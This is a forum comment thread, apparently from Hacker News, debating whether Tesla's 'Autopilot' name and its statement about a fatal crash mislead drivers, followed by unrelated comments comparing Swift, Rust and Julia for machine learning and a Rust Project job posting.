The page's title is "Autopilot | Tesla". It is the first result for "tesla autopilot" in search results. And "autopilot" appears 9 times on the page. So if that's not an intentional attempt to mislead consumers into conflating Autopilot with "full self-driving", then what would such an attempt look like, hypothetically?
Is it crazy to hold a driver to a higher standard than simply Googling "Tesla autopilot" and only reading the first paragraph of the first result? If you read that entire page, the difference between autopilot and full self-driving is clear. If you read the car's manual, the difference is clear. If you look at the configurator for the car, the difference is clear when you have to pay $3,000 extra for full self-driving. I am not sure how any responsible Tesla owner could think that this is only a single feature.
> Is it crazy to hold a driver to a higher standard than simply Googling "Tesla autopilot" and only reading the first paragraph of the first result?
For this standard it would have to apply to every driver. Should drivers who do not google "Tesla autopilot", let alone ones that do and read on in a section about said autopilot feature, be punished with death in a two ton metal trap?
I really don't see how this is different than other features of a car like cruise control. It is up to the driver to educate themselves about cruise control. I was not part of my driver education class. There were no questions about it during the tests to get my license. I didn't learn how it worked until I was in my 20s when I first owned a car that had cruise control and I learned by reading that car's manual. I don't think anyone would have blamed the manufacturer if I killed myself because I didn't understand how cruise control worked or if I used it improperly.
It isn’t crazy to ask that, but I think it is crazy to view failing to create two pages as an intentional attempt to deceive or as something that absolves drivers of their own responsibilities.
If autopilot crashes at a lower rate than the average driver, they are correct, but autopilot+attentive driver would still be better than either alone.
The current thread is about what Tesla means by use of "autopilot". The parent commenter was telling us that Tesla only intends for it to have the same meaning as it does in aviation. My response is pointing out how Tesla seems to imply "autopilot" involves "full self-driving".
At what point is an attentive driver expected to notice that autopilot has silently failed? The video linked at the top of the thread has a <1 second interval between the car failing to follow its lane, and plowing into a concrete barrier.
This is actually harder to do then just driving the car.
The fatal impact may not be seconds away but the event that sets in motion the series of actions that results in that fatal impact may take only seconds.
The issue is how long between the problem first manifesting itself and a crash becoming inevitable. Note that even as short a time as ten seconds is an order of magnitude longer than one second. There are at most only a few rare corner cases in aviation where proper use of the autopilot could take the airplane within a minute of an irretrievable situation that would not have occurred under manual control.
I'm not a pilot so I do not know the most dangerous situations when flying under autopilot. What I was trying to emphasize is that even under autopilot airplanes require constant attention. My understanding is that if the pilot or co-pilot leaves the cockpit for any reason the remaining pilot puts on an oxygen mask in case of decompression because the time frame before blackout is so tiny. The point is that autopilot in aviation is a tool that can be employed by pilots but cannot function safely on its own. From this viewpoint Tesla's Autopilot is accurately named although the public does not have the same understanding.
There are a lot of things in aviation that are done out of an abundance of caution (and rightly so) rather than because flights are routinely on the edge of disaster. Depressurization is not an autopilot issue, and putting on a mask is not the same as constant vigilance. Even when not using autopilot, pilots in cruise may be attending to matters like navigation and systems management that would be extremely dangerous if performed while driving.
Personally, I do not think calling Tesla's system 'autopilot' is the issue, but your claim that it is accurate is based on misunderstandings about the use of autopilots in aviation. It is not the case that their proper use puts airplanes on the edge of disaster were it not for the constant vigilance of the pilots.
If the pilots are not flying, then it can be just a short time away from a crash. Like when the pilot is not paying attention and by the time the auto pilot can no longer fly, the pilot doesn't have enough situational awareness to take over.
That is very much an outlier, and if it were at all relevant to the issue it would further weaken your case, as these three pilots had several minutes to sort things out. Questioning the assumptions underlying the assumed safety of airplane autopilot use can only weaken the claim that Tesla's 'autopilot' is safe.
This isn't a debate about dictionary definitions, it's a debate about human behavior.
People who say that "Autopilot" is a bad name for this feature aren't basing it on an imperfect understanding of what autopilot does in airplanes. They're basing it on how they believe people in general will interpret the term.
So you’re saying that Tesla drivers are only educated by marketing materials and ignore what the car says every time they engage the autopilot feature?
They are saying that Tesla drivers are not super humans, and only average every day, garden variety human beings...
The funny thing is that it is the same people who are arguing for self driving tech by saying that "Humans will do dumb shit", is the same ones who justify Tesla by saying "Humans should not do stupid things (like ignoring the cars warning)"..
They aren't going to literally fall asleep, but much of the time pilots are reading a book and not directly paying attention in the same way that a driver is.
Planes don't suddenly crash into a mountain because you have looked away for two seconds, there is much more time to react in case the autopilot doesn't behave correctly.
They can very suddenly crash into another plane because you have looked away for two seconds. It has actually happened (though nowadays, technology has made it easier to avoid these accidents).
Planes are supposed to maintain a 5 mile separation distance. You aren't going to break that down in two seconds. (But head on, with both planes traveling 600 MPH, you can do it in 15 seconds. But both pilots would have to be inattentive for that time.)
They are supposed to, but if flight control doesn't help them do it, pilots have only very little time to react to what they meet. This was demonstrated in the Hughes Airwest collision with an F-4 in 1971.
Since then, air traffic control procedures have been improved to avoid these situations, but nowadays e.g. over the Baltic Sea, Russian military planes are routinely flying with their transponder turned off so that flight control does not know where they are. So, this risk is still there.
I don't buy it either, and the airline business has lots of history to show that it is bunk. Autopilot must either be better than humans or not be present. I'm sure the car autopilot engineers have learned much from airplanes. And I'm pretty sure that Tesla management has overrode the engineers concerns because they'd rather move fast and break things.
If a person uses a device while using autopilot, (which seems highly likely—not sure in thi instance) wouldn’t it be advisable to have the alerts come to them directly on whichever device they are using? The alert breaks them out of whatever task they are focusing on. If the alert is coming from the car I can see how a lot of us could ignore it.
What a world. Where we can't even take enough responsibility to be present enough to hear the "You are about to die" bell chime.
Imagine the possible breaking components in that chain too. Bluetooth can fail, satellite can fail, cell can fail,
WiFi can fail, a USB cable can fail, there isn't a single piece of connectivity technology that would make me confident enough to delegate alerts to another device.
There is also an inherent failure of alarms in general in that even very loud ones can be ignored if they give false positives even once or twice. There is a body of study trying to address it. Some of the most fatal industrial accidents occured because alarms were either ignored or even fully switched off. We aren't good with alarms.
I think the meat of it though is that unless Auto-pilot works perfectly then you can't leave it alone. And if you can't leave it alone then what's the point?
The sell for autonomous cars isn't that people are just so darn tired of turning the steering wheel that they would really rather not. It's that we could potentially be more productive if we could shift our full attention to work/study/relaxation while commuting.
It seems like we are in an “in-between” state where we are using humans to assuage the fears of people that aren’t sure if neural networks can drive better than humans. The goal is to eventually focus on something else. If it’s just about making driving safer I would think it’s more of an incremental innovation step versus the breakthrough concept of being able to do something else while being commuted completely by a neural-network driven vehicle. The bridge to get to this breakthrough hopefully isn’t hacked apart by naysayers. Every death should be met with empathy and a desire to strengthen this bridge and quicken the speed of crossing it.
I try to tell people that if you cannot take a nap behind the wheel of a self-driving car, then the automaker has failed to produce a self driving car. If you have to be attentive behind the wheel of a self driving car, then you might as well just steer it yourself.
The general sentiment is correct but the wording implies some degree of acceptance of liability: Autopilot was engaged... took no evasive action... engineers are investigating... failed to detect.
They should have issued a single, very simple statement that they are investigating the crash and that any resulting improvements would be distributed to all Tesla vehicles, so that such accidents can no longer happen even when
drivers are not paying sufficient attention to the road and ignore Autopilot warnings. Then double down on the ideea that Autopilot is already safer than manual driving when properly supervised and that it constantly improves.
The specifics of the accident, victim blaming, whether the driver had or not his hands on the wheel or was aware of Autopilot's problems is something that should be discussed by lawyers behind closed doors. And of course, deny it media attention and kill it in preliminary investigation, which I imagine they will have no problem in doing, he drove straight into a steel barrier for God's sake.
Doesn't help that fucking Elon Musk and half of Silicon Valley keeps saying AI technology will solve all driving problems, when they should know fully well that autonomous cars are never going to happen without structural changes to roads themselves.
Silicon Valley needs to stop trying to make autonomous cars happen.
What structural changes? Considering that self-driving cars are already running daily in many cities, those changes must be fairly minor since they've already been implemented in those cities.
Volvo's messaging is less reckless than Tesla's. They call their similar feature "Pilot assist." It's also always been stricter about trying to make sure the driver is engaged when it's enabled. As a Volvo owner, I'll admit I find it annoying at times, but I think it's also helped drill into me that I shouldn't trust Pilot Asssist not to drive me into a barrier. It's amazing at keeping me in my lane when I'm fiddling with my podcast feed though.
>It's amazing at keeping me in my lane when I'm fiddling with my podcast feed though.
I hate to be sanctimonious at people online but this is how people get killed. Is it not illegal to do this where you live? In the UK you'd be half way to losing your license if you got caught touching a phone while driving (and lose it instantly if within the first 2 years of becoming a qualified driver).
You just said it yourself, you can't trust it, so don't play with your phone while driving, lane assist or not.
He didn’t mentioned a phone however... it’s 2018 people that can afford that type of car must have podcast friendly onboard entertainement. Which is as dangerous as radio fiddling but not illegal.
I have a Volvo as well and it is annoying when the dashboard goes nuts warning of impending doom when experience tells me that the vehicle/obstacle ahead isn't actually an issue. That said, it has saved my bacon at least once at an unfamiliar highway exit in rush hour when traffic went from 40mph to a dead stop almost immediately.
Lane assist has also led me to be much better about always signaling lane changes lest the steering try to fight me.
> It's amazing at keeping me in my lane when I'm fiddling with my podcast feed though.
That's exactly what the tesla driver must have thought too. Right until the auto pilot steered directly into a barrier. Volvo S's system may be better, but any lapse in attention can lead to the type of crash we are discussing about.
I wonder if Tesla decided they want to own the term 'autopilot' at a short term expense, forcing other manufacturers to use less obvious names down the track. Cause it seems strange they would stick with a term that could encourage lawsuits and frivolous behaviour by drivers.
I find this argument so often. Autopilot has never been a term for autonomous, just as its used in aviation. Just because people don't know the proper term or have an erroneous idea of the term, doesn't mean tesla has to have the burden of people misinterpreting what it says.
See, I'm not sure if you know this... but most people are not Pilots.. ( disclaimer, I'm not only a programmer, but also hold an A&P and avionics license, as well as a few engine ratings ).
It is ABSOLUTELY on a manufacturer to make sure their potentially life ending feature, is not named in a way that can confuse the target audience. You know. NON PILOT car drivers.
Arguing with Tesla/Musk fanatics now is like arguing with Facebook/Zuck fanatics was ten years ago, or saying that a Google was bad news in their “don’t be evil” days. You’re right, but only time and loads of evidence will convince some people that what they desperately want to believe isn’t true.
Of course “Autopilot” is intended to evoke the common meaning as a marketing tool, and not the nuanced, highly technical meaning understood by pilots. Understand though, that when someone argues against that point the pedantry is just a proxy for their fanaticism, and until the fanaticism dies, the excuses will be generated de novo. You’re bringing reason and logic to an emotional fight.
I would really prefer not being called a fanatic just because i believe that the term "autopilot" isn't a proxy for "autonomous". I've always seen that autonomous is a goal of tesla but they have always said their system is limited, and that it requires vigilance.
Forgive me but I've never seen any plane where, once in autopilot, the pilot/s are not checking and observing the conditions of the plane and making sure everything is alright.
And yet, I don't recall ever in any documentary or so, having seen the pilots get up and leave once the autopilot is on? They have humongous checklists to parse, do they not?
I want you to go on wikipedia(is that not mainstream enough) and search for the term Autopilot. Reads its ACTUAL definition and come back.please.
> Autopilot has never been a term for autonomous, just as its used in aviation.
Autopilots used in modern commercial airplanes are autonomous. You don't have to watch them, they will do their job. The airplane is either controlled by the pilots or the autopilot. There is a protocol to transfer the control between pilots and the autopilot, such that it is clear who is in charge of controlling the plane (there's even a protocol to transfer this between pilots).
The autopilot will signal when it is no longer able to control the plane (because of, e.g., technical faults in the sensors).
Yes, there are also autopilots in smaller airplanes which are more or less just a cruise control. But everything in between, where is it unclear who is doing what are where the limits of the capabilities are, have been scrapped because people died.
> doesn't mean tesla has to have the burden of people misinterpreting what it says.
Because Tesla is so pretty clear in stating what their autopilot is able to do and what not.
Do you believe Tesla bears the burden of maintaining its own homepage? tesla.com/autopilot currently has "Full Self-Driving Hardware on All Cars" as its top headline and has had that for awhile now.
Well, they do have the hardware, that isn't the issue.
The cars simply lack the software to enable a fully autonomous vehicle. The phrasing indicates that if/when the software becomes available, the car would be theoretically capable of driving itself.
It's just a typical misleading marketing blurb; nothing more.
They don't actually know that they have hardware for full autonomy till they have a fully working hardware/software autonomy system; what they have is hardware that they hope will support full autonomy, and a willingness to present hopes as facts for marketing purposes.
Yes, it is the issue because no one has achieved full self-driving yet so Tesla simply has no idea what hardware may be required to achieve that level of functionality in real-world situations.
But that wasn't the line of argument I was making. The parent commenter said this about people misunderstanding the term "autopilot"
> Just because people don't know the proper term or have an erroneous idea of the term, doesn't mean tesla has to have the burden of people misinterpreting what it says.
Seems like people might be mistaken because the phrase "Full Self-Driving" is literally the first thing on the official Tesla Autopilot page.
In a sense though, without the software the hardware isn't self-driving, at least enough to be misleading. If you saw "Full Voice-Recognition Hardware on All Computers", you would expect it to actually recognise voices, not just come with a microphone.
The problem is that Tesla creates the misinterpretation by explicitly stating that Autopilot is a self-driving system rather than a driver-assist system.
But check out my Full Self Driving AP2 hardware, driving coast to coast! You can even ask your car to earn you money on Tesla Network! Tesla Autopilot twice as safe as humans in 2016! Sentient AI will kill humans!
You seem to understand the difference. Everyone in this thread seems to understand the difference. So why should anybody believe a failure to understand the term is a problem?
What a stark difference in tone this kind of statement would have made. Tesla's statement reeks of a desire to protect themselves from liability or a potential lawsuit. It's very sad to see them adopting such language in the face of such a tragedy.
Not Tesla, but they can afford to pay someone to write a thoughtful and sympathetic response to a tragedy in a way that also protects them from a lawsuit.
This sample statement makes it very clear that the user was misusing autopilot and trusting it beyond its intended function, but also shows sympathy for the family's situation.
They say they can't possibly afford to have cars download the maps at the wifi of service stations, yet they don't see any issue with leeching off Starbucks' free wifi. How anyone could have written that e-mail with a straight face is beyond me.
The problem with releasing statements like this is they can be used against Tesla in court. Anything that seems like an admission of guilt or responsibility will be used against them, which is why we see so little of it.
>Doesn't your statement admit that Tesla is at least partially at fault? Something their lawyers would probably never allow.
IANAL so take with a grain of salt. I once talked to a lawyer who used to work for a big hospital and handled the malpractice lawsuits against them. Three takeaways from the discussion:
1. Implying that a possibility exists that the hospital was at fault has no legal ramifications whatsoever.
2. The studies show an apology and admission has a significant impact on the amount paid to the patient if there is a settlement (in favor of the hospital).
3. Despite knowing 1 and 2, he and other lawyers advise their clients to deny wrongdoing all the way to the end.
Trust is the final layer of competition, trust comes with accountability, taking responsibility. If Tesla et al don't have this fear driving them to do right, then they will lose our respect and our hearts.
How should one deploy such a product at all?
Actual usage is really the only way anyone will know if the models are trained appropriately to handle most/all situations they will encounter in the real world.
> Actual usage is really the only way anyone will know if the models are trained appropriately to handle most/all situations they will encounter in the real world.
Because testing stuff before throwing it on the market isn't a thing anymore?
Surely you do not assume that Tesla had done no testing at all before selling these things.
I forewent commenting on their pre-market testing because I assumed that flokie already knew that the cars and ML models they use had been extensively tested on tracks and in simulation before the first Tesla was allowed on California roads.
And they would have be complete idiots had they not done such testing, no investors would have funded that.
Reactions like flokie's were completely predictable the moment driver assistance techniques were thought of. The only acceptable response a company can have to such criticism is "we have tested this extensively and it is safer than driving manually".
Market forces aside, no car drives on roads in any US state without extensive testing and certification. All of the companies testing self-driving technology had to get special permits to do so.
"And furthermore, here is why we don't see fit to stop using the name Autopilot, even as we recognize that false sense of security it implies to the average person: ..."
You don't think there's an implied difference between Autopilot vs a name like Driver Assist? Even Co-pilot would be be a better name as it implies an expectation that the driver is still ultimately responsible.
I'm asking for data. The data doesn't care what you and I think. And the data will reflect what Tesla drivers think, as opposed to people who've only heard Tesla's marketing. Tesla drivers get reminded about the limitations of the autopilot system each time they enable it.
The literally hundreds of posts on HN about it being a problem are data that it is. And that's a tech-savvy crowd that theoretically would know the limitations of the system.
There are literally hundreds of posts on HN claiming that it's a problem. That's data for it being a commonly-held belief, not data for it being a problem with actual Tesla drivers.
The only posts I saw on HN are claiming that it is a problem. If anything, that's evidence that it's not actually a problem, because people are recognising that it _might_ be misleading, rather than _being_ misled.
Tesla has world-class PR, let's assume they're saying the right thing. What circumstances might they be facing to which this message is a correct response?
I personally like your style and tone. At a glance I would only replace his first name with Mr. to increase respect and depersonalize it.
I think it’d be a tough sell to get the blessing of Tesla’s legal team. Given Musk’s position he could override that of course, but it could still reduce the likelyhood of it going out.
Overall as much as I prefer it, I think most companies wouldn’t release something this direct and honest. Although that’s changing at some companies as they find that the goodwill built through lack of bullshit can sometimes outweigh distasteful liability defense techniques.
They’re really digging themselves a hole. Can you imagine explaining to a jury that your “autopilot” isn’t “fully-autonomous” and trying to justify that as not misleading by pointing to “autopilots in aviation?”
It's called a 'brand name' and people are surrounded by them. I can't eat my Apple MacBook, despite the fact it is misleadingly branded as fruit. Everyone in this thread seems perfectly capable of understanding that 'autopilot' doesn't mean 'fully autonomous', and they got to that understanding through the fairly mundane and routine method of thinking about it.
It seems like Tesla is careful not to dispel the illusion it can. Like how alcohol does not get you women- but all the adverts deftly imply it can, without actually saying it can.
Great copywriting. It seems in part this is a user interface issue in that the limitations of the system are not clearly enough surfaced so people’s expectations are off-base.
"from an event like this" is an important part of the statement.
Pretend for a moment that the occurrence of the accident was a foregone conclusion. In such a scenario, the most positive thing that could be done would be to use the information to save the lives of others.
There's a smidgen of humility in the phrasing; that the accident might have been avoidable with the information that has been gained as a result of the accident. Of course, I presume that sort of sentiment would fall squarely under the "admission of guilt" umbrella that prevents companies from saying things like this.
I think of it this way:
Most car manufacturers are releasing their products on the public year after year, knowing full well that a decent percentage of people that drive away from the dealership will be killed by the thing they just bought.
Tesla is merely trying to take the next step in reducing that percentage.
Their strategy is sound and we so far have not come up with any alternatives that stand a remote chance of improving safety as much as self-driving. Even if they are largely unsuccessful, they are indeed trying to ensure the safety of the public.
> Most car manufacturers are releasing their products on the public year after year, knowing full well that a decent percentage of people that drive away from the dealership will be killed by the thing they just bought.
Nope, and that's the whole difference. They will be killed by theirs actions, their choices, their inattention, or those of other drivers. They won't be killed by the machine.
With autopilot / pseudo-autopilot, they will be killed by the machine.
It is a huge difference, both in terms of regulations of people transportation safety, and in terms of human psychology, which makes a big difference between being in control and not being in control of a situation.
I agree that it is a psychological difference but our behavior as a society suggests a recognition that the machine and it's makers have a role in whether or not people die in cars.
This is why we demand safer cars and sue car makers when their designs failed or did not meet our expectations in protecting the occupants.
I can agree with the notion that the machine killed the person in all cases where the the machine does not include any controls for the person.
As a society, we currently recognize that the causes of accidents and the probability of occupant death are dependent on multiple factors, one of which is the car and it's safety features (or lack there of). https://en.wikipedia.org/wiki/Traffic_collision#Causes
We also already have a significant level of automation in almost all cars, yet we are rarely tempted to say that having cruise-control, automatic transmissions, electronic throttle control, or computer controlled fuel injection means we are not in control and therefore the machine is totally at fault in every accident.
Operating a car was much harder to get right before these things existed and the difference can still be observed in comparison to small aircraft operations.
Then and now we still blame some accidents on "driver/pilot error" while others are blamed on "engine failure", "structural failure", or "environmental factors".
I think having steering assistance or even true autopilot will not change this. In airplanes, the pilots have to know when and how to use an autopilot if the plane has one.
If the pilot switches on the autopilot and it tries to crash the plane, the pilot is expected to override and re-program it, failure to do so would be considered pilot error.
Similarly, drivers will have to know when and how to use cruse-control/steering-assist and should be expected to override it when it doesn't do the right thing.
Stalin probably didn't say it and the quote is usually used to highlight how the human brain cannot comprehend the devastation of a hundred deaths while it can easily feel grief for one death.
It'd be more like releasing a clone of Dropbox called "Dropbox for Backing Up Files" that made your files public and gave your credit card info to Russian hackers.
Sure it might look neat to someone on the outside but it wouldn't take long to see it's nothing like the real thing made by someone who knows what they're doing.
They want to build up the language compiler itself to better support machine learning. That requires a language with enough type information to support sophisticated analysis. It should be built on LLVM. It needs an existing ecosystem of tools and libraries. And having a better performing language than Python is likely a win.
Swift fits the requirements. As Chris Lattner is driving this, no one could ask that he choose something else.
But Rust also would have been a plausible choice. As the Rust team is very interested in applying the language to exciting new use-cases, it's a bit of a loss for it to miss out on collaboration here. Perhaps this could inspire similar work on the Rust side; many of the concepts would likely transfer straightforwardly.
The principle reason Python flourishes is because it's highly expressive and readable. (There are things it misses, such as sensible lambda, any reasonable multi-threading model, etc.)
I can't see Rust competing on similar merits. Swift however (like Kotlin to which it is extremely similar) seem to be in the right sweet spot in terms of languages designed for usability, with a lot of useful f.p. constructs.
It depends on if all your writing cutom functionality. If all you have is one big main function, rust is pretty readable. Function definitions and structs are where things get a little messier.
I can't agree - there's too much going on in Rust - most people using Python want something approaching Matlab or R for ease of use.
I'm not saying Rust doesn't have it's sweet spot - but I can't see that as a general purpose language. (Likewise Haskell and Scala - that's just my opinion though :))
>And having a better performing language than Python is likely a win
I was under the impression that most Python libraries for machine learning (numpy, scipy, tensorflow, etc) are running C code under the hood. How much is Python's performance really holding it back?
>They want to build up the language compiler itself to better support machine learning. That requires a language with enough type information to support sophisticated analysis. It should be built on LLVM. It needs an existing ecosystem of tools and libraries. And having a better performing language than Python is likely a win.
You literally just described Julia. The Julia core developers are all part of Julia Computing (which contracts for ML work) or are somehow associated with data science and machine learning. For this reason there's a lot of on tooling for building computational graphs / performing AD, compiling for TPUs, etc. It's built on LLVM. It has loads of packages for optimization, machine learning (like 4 NN libraries, a few different ways to work with GPUs), data science, etc. And type-stable Julia code is as fast as C. So it's interesting that this gets some kind of noteworthy announcement when it's already been done and already been done well.
Rust is a programming language that helps people build reliable and efficient software at scale. It's a language that many people love.
The members of the Rust Project work together to build and advance this language and its related tooling and infrastructure. We take a particular pride in shipping tools that are stable and well polished.
We've lately been doing more explicit program management as part of our ongoing work to improve and scale our processes for shipping our language and these high quality tools. We've developed systems and standards for this that have proven to work well within the Rust Project, and we've been seeing substantial value from this work being done in the context of our edition and project goal programs.
We're now looking to hire some sharp and talented individuals to support and advance these systems and this work. That's where you come in.
For details on this role, and how to contact us about it, see here:
https://hackmd.io/VGauVVEyTN2M7pS6d9YTEA